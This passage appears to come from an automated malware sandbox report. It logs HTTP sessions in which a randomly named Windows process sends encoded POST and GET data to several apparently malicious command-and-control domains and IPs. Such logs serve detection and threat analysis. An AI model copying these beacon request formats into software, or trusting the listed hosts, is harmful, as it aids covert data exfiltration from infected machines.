                                                                                  35 | 192.168.2.5 | 50016 | 209.74.77.109 | 80 | 3812 | C:\Program Files (x86)\gFGqeaWqpCObVJdzrccxBgzYNETtKfLEBKNnEuNERPFyzzWJpUVvFafGUP\pDqSqZXvqQcT.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Nov 27, 2024 01:28:08.724385977 CET | 1652 | OUT | POST /6gtt/ HTTP/1.1
                                                                                  Host: www.gogawithme.live
                                                                                  Accept: */*
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Origin: http://www.gogawithme.live
                                                                                  Cache-Control: max-age=0
                                                                                  Content-Length: 1242
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Referer: http://www.gogawithme.live/6gtt/
                                                                                  User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                  Data Ascii: lH_L4=[TRUNCATED]
                                                                                  Nov 27, 2024 01:28:09.999281883 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                                                  Date: Wed, 27 Nov 2024 00:28:09 GMT
                                                                                  Server: Apache
                                                                                  Content-Length: 389
                                                                                  Connection: close
                                                                                  Content-Type: text/html
                                                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  36 | 192.168.2.5 | 50017 | 209.74.77.109 | 80 | 3812 | C:\Program Files (x86)\gFGqeaWqpCObVJdzrccxBgzYNETtKfLEBKNnEuNERPFyzzWJpUVvFafGUP\pDqSqZXvqQcT.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Nov 27, 2024 01:28:11.537964106 CET | 361 | OUT | GET /6gtt/?lH_L4=SGA0vAB7ljjiJZBksJb1gqec1i3dMNjZK6uCbLTCC3HP5ur0cn6Abe6/hzp/g4dh4YOAUYGeqr6sPYYs6bnbftG3TST47at8LnD6yWitNli0aOZiiyErkaGZ0ExcXW9KKA==&005PE=aNcLxhD894SLKl HTTP/1.1
                                                                                  Host: www.gogawithme.live
                                                                                  Accept: */*
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                  Nov 27, 2024 01:28:12.844492912 CET | 548 | IN | HTTP/1.1 404 Not Found
                                                                                  Date: Wed, 27 Nov 2024 00:28:12 GMT
                                                                                  Server: Apache
                                                                                  Content-Length: 389
                                                                                  Connection: close
                                                                                  Content-Type: text/html; charset=utf-8
                                                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  37 | 192.168.2.5 | 50018 | 161.97.142.144 | 80 | 3812 | C:\Program Files (x86)\gFGqeaWqpCObVJdzrccxBgzYNETtKfLEBKNnEuNERPFyzzWJpUVvFafGUP\pDqSqZXvqQcT.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Nov 27, 2024 01:28:18.467114925 CET | 606 | OUT | POST /jm2l/ HTTP/1.1
                                                                                  Host: www.54248711.xyz
                                                                                  Accept: */*
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Origin: http://www.54248711.xyz
                                                                                  Cache-Control: max-age=0
                                                                                  Content-Length: 206
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Referer: http://www.54248711.xyz/jm2l/
                                                                                  User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                  Data Ascii: lH_L4=B0dCoKtIGqGctzor+a7cE1KVxuyp3if3IpzxDyQvUDVsVb0A5Uk0JolZGYasu+d9pQtC1PBvGAV5xxYqicW9jd5IouAWTMR0iBx7PVJN+BfD4jKBe4xFXlsGm/0oh2NtNNme+HlxXgw3TZVughixUemtd+AM53rd2kk496SYVPvEyxscAH9LZ4c3WOwlTUK8OdSAnqg=
                                                                                  Nov 27, 2024 01:28:19.747399092 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                  Server: nginx
                                                                                  Date: Wed, 27 Nov 2024 00:28:19 GMT
                                                                                  Content-Type: text/html; charset=utf-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Vary: Accept-Encoding
                                                                                  ETag: W/"66cce1df-b96"
                                                                                  Content-Encoding: gzip
                                                                                  Nov 27, 2024 01:28:19.747461081 CET | 370 | IN | (continuation of the gzip-compressed response body)


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  38 | 192.168.2.5 | 50019 | 161.97.142.144 | 80 | 3812 | C:\Program Files (x86)\gFGqeaWqpCObVJdzrccxBgzYNETtKfLEBKNnEuNERPFyzzWJpUVvFafGUP\pDqSqZXvqQcT.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Nov 27, 2024 01:28:21.130261898 CET | 626 | OUT | POST /jm2l/ HTTP/1.1
                                                                                  Host: www.54248711.xyz
                                                                                  Accept: */*
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Origin: http://www.54248711.xyz
                                                                                  Cache-Control: max-age=0
                                                                                  Content-Length: 226
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Referer: http://www.54248711.xyz/jm2l/
                                                                                  User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                  Data Ascii: lH_L4=B0dCoKtIGqGciz4r89HcM1KW0uypsSfNIpPxD3poU2FsW6EA4WA0EIlZM4atjecQpRQ11LBvGAB5xwoqirK+xd5KhOAUOcR0iBx7PVNr+FzD4S6BcaVGUlsZh/0ol2NTNNm4+G4aXjI3TYlug0ewfemrTeBO9GS0xl1154qfN/7y+nd2al1jKYwPGd4SCkrVU+Cw59270M4VrSRlYDHR5RO3mssZ
                                                                                  Nov 27, 2024 01:28:22.408601999 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                  Server: nginx
                                                                                  Date: Wed, 27 Nov 2024 00:28:22 GMT
                                                                                  Content-Type: text/html; charset=utf-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Vary: Accept-Encoding
                                                                                  ETag: W/"66cce1df-b96"
                                                                                  Content-Encoding: gzip
                                                                                  Nov 27, 2024 01:28:22.408643007 CET | 370 | IN | (continuation of the gzip-compressed response body)


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  39 | 192.168.2.5 | 50020 | 161.97.142.144 | 80 | 3812 | C:\Program Files (x86)\gFGqeaWqpCObVJdzrccxBgzYNETtKfLEBKNnEuNERPFyzzWJpUVvFafGUP\pDqSqZXvqQcT.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Nov 27, 2024 01:28:23.805068970 CET | 1643 | OUT | POST /jm2l/ HTTP/1.1
                                                                                  Host: www.54248711.xyz
                                                                                  Accept: */*
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Origin: http://www.54248711.xyz
                                                                                  Cache-Control: max-age=0
                                                                                  Content-Length: 1242
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Referer: http://www.54248711.xyz/jm2l/
                                                                                  User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                  Data Ascii: lH_L4=[TRUNCATED]
                                                                                  Nov 27, 2024 01:28:25.029800892 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                  Server: nginx
                                                                                  Date: Wed, 27 Nov 2024 00:28:24 GMT
                                                                                  Content-Type: text/html; charset=utf-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Vary: Accept-Encoding
                                                                                  ETag: W/"66cce1df-b96"
                                                                                  Content-Encoding: gzip
                                                                                  Nov 27, 2024 01:28:25.029814959 CET | 370 | IN | (continuation of the gzip-compressed response body)


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  40 | 192.168.2.5 | 50021 | 161.97.142.144 | 80 | 3812 | C:\Program Files (x86)\gFGqeaWqpCObVJdzrccxBgzYNETtKfLEBKNnEuNERPFyzzWJpUVvFafGUP\pDqSqZXvqQcT.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Nov 27, 2024 01:28:26.563488007 CET | 358 | OUT | GET /jm2l/?lH_L4=M21ir/NSFfGrmB4z/u+JMR/HgMrfgTX4RaXyCSFwSSwtaZs5yH0UEptpPba+9Px3pipv0aZDZRRy+Xo/jJmyh9BQr7AsY9ps2ywsUHN31DffyA3sdKxmASYgpvofv0k0Sg==&005PE=aNcLxhD894SLKl HTTP/1.1
                                                                                  Host: www.54248711.xyz
                                                                                  Accept: */*
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                  Nov 27, 2024 01:28:27.843817949 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                  Server: nginx
                                                                                  Date: Wed, 27 Nov 2024 00:28:27 GMT
                                                                                  Content-Type: text/html; charset=utf-8
                                                                                  Content-Length: 2966
                                                                                  Connection: close
                                                                                  Vary: Accept-Encoding
                                                                                  ETag: "66cce1df-b96"
                                                                                  Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Page Not Found</title><style>body {background-color: #f5f5f5;margin-top: 8%;color: #5d5d5d;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, "Helvetica Neue", Arial,"Noto Sans", sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol","Noto Color Emoji";text-shadow: 0px 1px 1px rgba(255, 255, 255, 0.75);text-align: center;}h1 {font-size: 2.45em;font-weight: 700;color: #5d5d5d;letter-spacing: -0.02em;margin-bottom: 30px;margin-top: 30px;}.container {width: 100%;margin-right: auto;margin-left: auto;}.animate__animated {animation-duration: 1s;animation-fill-mode: both;}.animate__fadeIn {animation-name: fadeIn;}.info {color: #5594cf;fill: #5594cf;}.error [TRUNCATED]
                                                                                  Nov 27, 2024 01:28:27.843839884 CET | 224 | IN
                                                                                  Data Ascii: ;fill: #c92127;}.warning {color: #ffcc33;fill: #ffcc33;}.success {color: #5aba47;fill: #5aba47;}.icon-large {height: 132px;width: 132px;}.description-tex
                                                                                  Nov 27, 2024 01:28:27.843853951 CET | 1236 | IN
                                                                                  Data Ascii: t {color: #707070;letter-spacing: -0.01em;font-size: 1.25em;line-height: 20px;}.footer {margin-top: 40px;font-size: 0.7em;}.animate__delay-1s {animation-delay: 1s;}@keyframes fadeIn
                                                                                  Nov 27, 2024 01:28:27.843985081 CET | 474 | IN
                                                                                  Data Ascii: -20.635-46-46-46z"></path></svg></div><h1 class="animate__animated animate__fadeIn">Page Not Found</h1><div class="description-text animate__animated animate__fadeIn animate__delay-1s"><p>Oops! We couldn


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  41 | 192.168.2.5 | 50022 | 185.27.134.206 | 80 | 3812 | C:\Program Files (x86)\gFGqeaWqpCObVJdzrccxBgzYNETtKfLEBKNnEuNERPFyzzWJpUVvFafGUP\pDqSqZXvqQcT.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Nov 27, 2024 01:28:33.470304012 CET | 630 | OUT | POST /cvhb/ HTTP/1.1
                                                                                  Host: www.canadavinreport.site
                                                                                  Accept: */*
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Origin: http://www.canadavinreport.site
                                                                                  Cache-Control: max-age=0
                                                                                  Content-Length: 206
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Referer: http://www.canadavinreport.site/cvhb/
                                                                                  User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                  Data Ascii: lH_L4=TZV6il5lEq3jwYVIPXt5cTZBcFr2jVgxJj3jB6U9wRiPDwl5p+Hd4/j6Mrrj+JgIBW64kfovYFcMOLrLNLme8dhNZLxRrwUq0ZyURahBVgRm77ncMEBJLD2WL/VoZozSLoa09U0b5IhBOYudLD4KQUQbRqskvav+5gSbbF4H2LtgDvS5L4H21QnBOy0WTZoeC0cHpGs=
                                                                                  Nov 27, 2024 01:28:34.700767994 CET | 1041 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 27 Nov 2024 00:28:34 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 840
                                                                                  Connection: close
                                                                                  Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                  Cache-Control: no-cache
                                                                                  Data Ascii: <html><body><script type="text/javascript" src="/aes.js" ></script><script>function toNumbers(d){var e=[];d.replace(/(..)/g,function(d){e.push(parseInt(d,16))});return e}function toHex(){for(var d=[],d=1==arguments.length&&arguments[0].constructor==Array?arguments[0]:arguments,e="",f=0;f<d.length;f++)e+=(16>d[f]?"0":"")+d[f].toString(16);return e.toLowerCase()}var a=toNumbers("f655ba9d09a112d4968c63579db590b4"),b=toNumbers("98344c2eee86c3994890592585b49f80"),c=toNumbers("14920d49321f67414c762f9a1fb56bb1");document.cookie="__test="+toHex(slowAES.decrypt(c,2,a,b))+"; expires=Thu, 31-Dec-37 23:55:55 GMT; path=/"; location.href="http://www.canadavinreport.site/cvhb/?i=1";</script><noscript>This site requires Javascript to work, please enable Javascript in your browser or use a browser with Javascript support</noscript></body></html>


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  42 | 192.168.2.5 | 50023 | 185.27.134.206 | 80 | 3812 | C:\Program Files (x86)\gFGqeaWqpCObVJdzrccxBgzYNETtKfLEBKNnEuNERPFyzzWJpUVvFafGUP\pDqSqZXvqQcT.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Nov 27, 2024 01:28:36.129889011 CET | 650 | OUT | POST /cvhb/ HTTP/1.1
                                                                                  Host: www.canadavinreport.site
                                                                                  Accept: */*
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Origin: http://www.canadavinreport.site
                                                                                  Cache-Control: max-age=0
                                                                                  Content-Length: 226
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Referer: http://www.canadavinreport.site/cvhb/
                                                                                  User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                  Data Ascii: lH_L4=TZV6il5lEq3jirdINxl5QjZCTlr26lgqJjLjB5Ytsz2PASt5o77dxvj6HLrmxpg9BWmGkaIvYE4MOJzLN8yd8NhPVrxPkQUq0ZyURaFrVgJm7L3cMlBGUz2JM/VoSIzWLoaG9V4i5KZBOY+dLWULHEQBfKtKmam37hK7cVB6pK1uCZjTRaPemwL5eh8hCpJ3YXM33R4nZVI1nYgCObfQiuzilTJU
                                                                                  Nov 27, 2024 01:28:37.409043074 CET | 1041 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 27 Nov 2024 00:28:37 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 840
                                                                                  Connection: close
                                                                                  Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                  Cache-Control: no-cache
                                                                                  Data Ascii: <html><body><script type="text/javascript" src="/aes.js" ></script><script>function toNumbers(d){var e=[];d.replace(/(..)/g,function(d){e.push(parseInt(d,16))});return e}function toHex(){for(var d=[],d=1==arguments.length&&arguments[0].constructor==Array?arguments[0]:arguments,e="",f=0;f<d.length;f++)e+=(16>d[f]?"0":"")+d[f].toString(16);return e.toLowerCase()}var a=toNumbers("f655ba9d09a112d4968c63579db590b4"),b=toNumbers("98344c2eee86c3994890592585b49f80"),c=toNumbers("14920d49321f67414c762f9a1fb56bb1");document.cookie="__test="+toHex(slowAES.decrypt(c,2,a,b))+"; expires=Thu, 31-Dec-37 23:55:55 GMT; path=/"; location.href="http://www.canadavinreport.site/cvhb/?i=1";</script><noscript>This site requires Javascript to work, please enable Javascript in your browser or use a browser with Javascript support</noscript></body></html>


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  43 | 192.168.2.5 | 50024 | 185.27.134.206 | 80 | 3812 | C:\Program Files (x86)\gFGqeaWqpCObVJdzrccxBgzYNETtKfLEBKNnEuNERPFyzzWJpUVvFafGUP\pDqSqZXvqQcT.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Nov 27, 2024 01:28:38.800612926 CET | 1667 | OUT | POST /cvhb/ HTTP/1.1
                                                                                  Host: www.canadavinreport.site
                                                                                  Accept: */*
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Origin: http://www.canadavinreport.site
                                                                                  Cache-Control: max-age=0
                                                                                  Content-Length: 1242
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Referer: http://www.canadavinreport.site/cvhb/
                                                                                  User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                  Nov 27, 2024 01:28:40.081840038 CET | 1041 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 27 Nov 2024 00:28:39 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 840
                                                                                  Connection: close
                                                                                  Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                  Cache-Control: no-cache
                                                                                  Data Ascii: <html><body><script type="text/javascript" src="/aes.js" ></script><script>function toNumbers(d){var e=[];d.replace(/(..)/g,function(d){e.push(parseInt(d,16))});return e}function toHex(){for(var d=[],d=1==arguments.length&&arguments[0].constructor==Array?arguments[0]:arguments,e="",f=0;f<d.length;f++)e+=(16>d[f]?"0":"")+d[f].toString(16);return e.toLowerCase()}var a=toNumbers("f655ba9d09a112d4968c63579db590b4"),b=toNumbers("98344c2eee86c3994890592585b49f80"),c=toNumbers("14920d49321f67414c762f9a1fb56bb1");document.cookie="__test="+toHex(slowAES.decrypt(c,2,a,b))+"; expires=Thu, 31-Dec-37 23:55:55 GMT; path=/"; location.href="http://www.canadavinreport.site/cvhb/?i=1";</script><noscript>This site requires Javascript to work, please enable Javascript in your browser or use a browser with Javascript support</noscript></body></html>


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  44 | 192.168.2.5 | 50025 | 185.27.134.206 | 80 | 3812 | C:\Program Files (x86)\gFGqeaWqpCObVJdzrccxBgzYNETtKfLEBKNnEuNERPFyzzWJpUVvFafGUP\pDqSqZXvqQcT.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Nov 27, 2024 01:28:41.583425999 CET | 366 | OUT | GET /cvhb/?lH_L4=eb9ahS5GFYDOhq0JOiIrfnQwKg301mZRXDTXF/EDnGWOAiF9jJHx+uvzEaHIq78+HHS43fAza3sJA+7AAuSex8cscvdTrTgngauHU4xbCBdC3sDNHF9YUQ2vDY1OdPiGaw==&005PE=aNcLxhD894SLKl HTTP/1.1
                                                                                  Host: www.canadavinreport.site
                                                                                  Accept: */*
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                  Nov 27, 2024 01:28:42.917366982 CET | 1202 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 27 Nov 2024 00:28:42 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 1000
                                                                                  Connection: close
                                                                                  Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                  Cache-Control: no-cache
                                                                                  Data Ascii: <html><body><script type="text/javascript" src="/aes.js" ></script><script>function toNumbers(d){var e=[];d.replace(/(..)/g,function(d){e.push(parseInt(d,16))});return e}function toHex(){for(var d=[],d=1==arguments.length&&arguments[0].constructor==Array?arguments[0]:arguments,e="",f=0;f<d.length;f++)e+=(16>d[f]?"0":"")+d[f].toString(16);return e.toLowerCase()}var a=toNumbers("f655ba9d09a112d4968c63579db590b4"),b=toNumbers("98344c2eee86c3994890592585b49f80"),c=toNumbers("14920d49321f67414c762f9a1fb56bb1");document.cookie="__test="+toHex(slowAES.decrypt(c,2,a,b))+"; expires=Thu, 31-Dec-37 23:55:55 GMT; path=/"; location.href="http://www.canadavinreport.site/cvhb/?lH_L4=eb9ahS5GFYDOhq0JOiIrfnQwKg301mZRXDTXF/EDnGWOAiF9jJHx+uvzEaHIq78+HHS43fAza3sJA+7AAuSex8cscvdTrTgngauHU4xbCBdC3sDNHF9YUQ2vDY1OdPiGaw==&005PE=aNcLxhD894SLKl&i=1";</script><noscript>This site requires Javascript to work, please enable Javascript in your browser or use a browser with Javascript support</noscript></body></html>


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  45 | 192.168.2.5 | 50026 | 172.67.138.37 | 80 | 3812 | C:\Program Files (x86)\gFGqeaWqpCObVJdzrccxBgzYNETtKfLEBKNnEuNERPFyzzWJpUVvFafGUP\pDqSqZXvqQcT.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Nov 27, 2024 01:28:48.675177097 CET | 612 | OUT | POST /z3ox/ HTTP/1.1
                                                                                  Host: www.questmatch.pro
                                                                                  Accept: */*
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Origin: http://www.questmatch.pro
                                                                                  Cache-Control: max-age=0
                                                                                  Content-Length: 206
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Referer: http://www.questmatch.pro/z3ox/
                                                                                  User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                  Data Ascii: lH_L4=aT9t+g+JeI7WNpfMWqZ/nC/EcthIW3THiCCAH0imAyGmCTifT+gX2No/Rrdy3qA3v7xpdO+s/UzpJmz1ylNdE2Cmz6hRVvoy4UMxifT7qyBzq6i5cP3JsQEVW7E9xfKwwSb9niVA1IagblsxawHQsEmHda0nA1trExPn9njavftKQv7yIoYFzo+5tx76EQXO+Nh7Ews=
                                                                                  Nov 27, 2024 01:28:49.997076035 CET | 1236 | IN | HTTP/1.1 404
                                                                                  Date: Wed, 27 Nov 2024 00:28:49 GMT
                                                                                  Content-Type: application/json
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Vary: Origin
                                                                                  Vary: Access-Control-Request-Method
                                                                                  Vary: Access-Control-Request-Headers
                                                                                  X-Correlation-ID: bcbcbda0-f5da-43e9-a8bd-8d497b1411f6
                                                                                  X-Content-Type-Options: nosniff
                                                                                  X-XSS-Protection: 1; mode=block
                                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                  Pragma: no-cache
                                                                                  Expires: 0
                                                                                  CF-Connecting-IP: 8.46.123.75
                                                                                  CF-IPCountry: US
                                                                                  cf-cache-status: DYNAMIC
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=233%2Bt6DMN1FmEuJjOTvd6cKU%2FUOkdolJ%2Bo48xDMguVqh2GzNcodYV3qGLhrImheA8%2FpiTbgCufZYt72yuVcodPauHFuz2CV0PrbKK3TTP3kBC4PfO43nIfxpDxvefP0Tn3WZBmo%3D"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8e8e001a2d857288-EWR
                                                                                  Content-Encoding: gzip
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2020&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=612&delivery_rate=0&cwnd=241&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  46 | 192.168.2.5 | 50027 | 172.67.138.37 | 80 | 3812 | C:\Program Files (x86)\gFGqeaWqpCObVJdzrccxBgzYNETtKfLEBKNnEuNERPFyzzWJpUVvFafGUP\pDqSqZXvqQcT.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Nov 27, 2024 01:28:51.330374002 CET | 632 | OUT | POST /z3ox/ HTTP/1.1
                                                                                  Host: www.questmatch.pro
                                                                                  Accept: */*
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Origin: http://www.questmatch.pro
                                                                                  Cache-Control: max-age=0
                                                                                  Content-Length: 226
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Referer: http://www.questmatch.pro/z3ox/
                                                                                  User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                  Data Ascii: lH_L4=aT9t+g+JeI7Wc5PMVNF/uC/DZthIE3TLiC+AH2PjBBimD2OfU7UX7to/e7d35KACv79fdPCs/SfpJnD1zUNeHGDAoKhTRvoy4UMxibDRqyJzqJ65fu3KyAEWfbE96/KKwSaSnnMr1Oegbn0xZlzT3UmFZa1NBFtuJRX78GmO7MBvVZKYSKQtgISB9izNVg2nkuxLan6o+lvP0YOmfNPox1hgcP5A
                                                                                  Nov 27, 2024 01:28:52.738586903 CET | 1236 | IN | HTTP/1.1 404
                                                                                  Date: Wed, 27 Nov 2024 00:28:52 GMT
                                                                                  Content-Type: application/json
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Vary: Origin
                                                                                  Vary: Access-Control-Request-Method
                                                                                  Vary: Access-Control-Request-Headers
                                                                                  X-Correlation-ID: 93fdea4e-e620-4662-a322-5531178283a9
                                                                                  X-Content-Type-Options: nosniff
                                                                                  X-XSS-Protection: 1; mode=block
                                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                  Pragma: no-cache
                                                                                  Expires: 0
                                                                                  CF-Connecting-IP: 8.46.123.75
                                                                                  CF-IPCountry: US
                                                                                  cf-cache-status: DYNAMIC
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Zi16AOOhxXWZivW2e2LqdEaJbJ%2B11yvfEueRQn%2FZBdLfmrQ7RwAtMmikmVTbY13q%2FCC6pxSJosCrfnhtKbWO0UcNbXnn%2FyCvWZRz1mGhlgAy%2BpHYxHll1xjSU4RVmmII1MVR2mg%3D"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8e8e002b4fcc42a7-EWR
                                                                                  Content-Encoding: gzip
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=19248&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=632&delivery_rate=0&cwnd=197&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  47 | 192.168.2.5 | 50028 | 172.67.138.37 | 80 | 3812 | C:\Program Files (x86)\gFGqeaWqpCObVJdzrccxBgzYNETtKfLEBKNnEuNERPFyzzWJpUVvFafGUP\pDqSqZXvqQcT.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Nov 27, 2024 01:28:54.143984079 CET | 1649 | OUT | POST /z3ox/ HTTP/1.1
                                                                                  Host: www.questmatch.pro
                                                                                  Accept: */*
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Origin: http://www.questmatch.pro
                                                                                  Cache-Control: max-age=0
                                                                                  Content-Length: 1242
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Referer: http://www.questmatch.pro/z3ox/
                                                                                  User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                  Data Ascii: lH_L4= [TRUNCATED]
                                                                                  Nov 27, 2024 01:28:55.474082947 CET | 1236 | IN | HTTP/1.1 404
                                                                                  Date: Wed, 27 Nov 2024 00:28:55 GMT
                                                                                  Content-Type: application/json
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Vary: Origin
